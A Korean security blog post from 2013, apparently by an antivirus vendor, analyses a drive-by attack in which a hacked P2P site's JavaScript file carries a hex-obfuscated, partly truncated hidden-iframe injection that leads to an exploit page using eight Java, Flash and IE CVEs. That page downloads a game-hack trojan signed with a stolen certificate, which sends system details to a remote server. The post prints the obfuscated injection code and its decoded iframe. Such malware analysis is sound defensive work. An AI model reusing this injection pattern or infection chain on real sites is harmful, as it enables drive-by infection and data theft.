본문 바로가기
악성코드 정보

국내P2P 사이트의 인증서를 악용한 온라인 게임핵

by DH, L@@ 2013. 6. 4.

 

 악성코드가 탈취한 인증서를 사용하여 자신을 서명한 사례는 국내외에서 간헐적으로 발생해 왔고 언론을 통해 보도 된 바 있다. 이번에 발견된 악성코드는 국내 해킹된 웹 사이트를 통해 유포가 됐으며, PC를 감염시키는 과정에서 생성된 파일들 중에 하나가 특정 P2P 사이트의 인증서로 서명되어 있음을 발견하였다.

[그림 1] 국내 P2P 사이트의 인증서로 서명된 악성코드


[그림 1]이 최종으로 취약점(JAVA, IE, Flash Player)이 존재하는 PC로 다운로드 되어 실행되기까지의 과정을 정리해 보면 아래와 같다.

최초 악성 스크립트 링크가 삽입된 페이지 역시 P2P 웹 사이트였으며, makePCookie.js 파일에 Hex 문자열로 난독화된 형태의 악성 스크립트 링크가 존재 하였다.

http://on****.co.kr/js/makePCookie.js

• 난독화된 악성 스크립트 링크:

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x69\x66\x72\x61\x6d\x65 \x77\x69\x64\x74\x68\x3d\x27\x31\x30\x30\x27x68\x65\x69\x67\x68\x74\x3d\x27\x30

\x27\x73\x72\x63\x3d\x27\x68\x74\x74\x70\x3a\x2f\x2f\x73\x6e\x73\x6f\x66\x74\x2e\x64

\x69//---중간생략---//\x2e\x68\x74\x6d\x6c\x27\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e");

 

• 난독화 해제 후 코드:

<iframe width='100' height='0' src='http://snsoft.******bill.co.kr/about/css.html'></iframe>

 

난독화된 코드가 IE에 의해서 해석되면서 또 다른 특정 사이트로부터 악성 스크립트인 css.html을 다운로드 한 후 실행되도록 되어 있다. css.html은 국내 해킹된 웹 사이트에서 흔히 볼 수 있는 Exploit Toolkit인 Dadong 으로 난독화 되어 있으며, 기존의 형태와 마찬가지로 악성코드를 PC에 감염시키기 위해서 다중 취약점(JAVA, IE, Flash Player 등)을 사용했으며, 조건이 부합된 취약점을 통해서 실제 악성코드를 다운로드 및 실행하도록 해두었다.

아래 코드는 난독화된 css.html을 난독화 해제 한 후이며, 가능한 많은 PC를 감염시키기 위해서 자바 취약점 6개, Flash Player 1개, IE 1개 등 총 8개의 취약점을 사용했다.

 

Java

Flash Player

IE

CVE-2011-3544

CVE-2012-0507

CVE-2012-1723

CVE-2012-4681

CVE-2012-5076

CVE-2012-5076

CVE-2013-0634

CVE-2012-1889

[표 1] css.html이 사용한 취약점 ID


만약 PC에 위 [표 1] 중에 하나의 취약점이 존재한다면 해당 취약점으로 인해서 특정 사이트로부터 파일을 다운로드 한 후 실행한다.

-. 파일 다운로드 URL: http://snsoft.*****bill.co.kr/about/up.exe

[그림 2] up.exe의 실행구조


up.exe에 의해서 생성된 "%SYSTEM%\[서비스 이름]+32.dll"의 파일명은 감염된 PC에서 윈도우 정상 파일인 svchost.exe를 통해서 실행되는 서비스 명과 조합되며, 해당 파일을 이용하는 서비스 목록은 아래 레지스트리키 에서 확인이 가능하다.

[그림 3] svchost.exe를 통해서 실행되는 서비스 리스트


또한 up.exe는 감염된 PC의 맥 주소와 운영체제 버전정보 등을 암호화한 후 특정 IP로 전송하는 기능도 있다.

192.168.247.129 -> 116.***.121.*** UDP 360 Source port: simba-cs Destination port: 7125

[그림 4] 암호화 안된 시스템 정보

[그림 5] 암호화된 시스템 정보


 

<V3 제품군의 진단명>

  Trojan/Win32.Agent 


댓글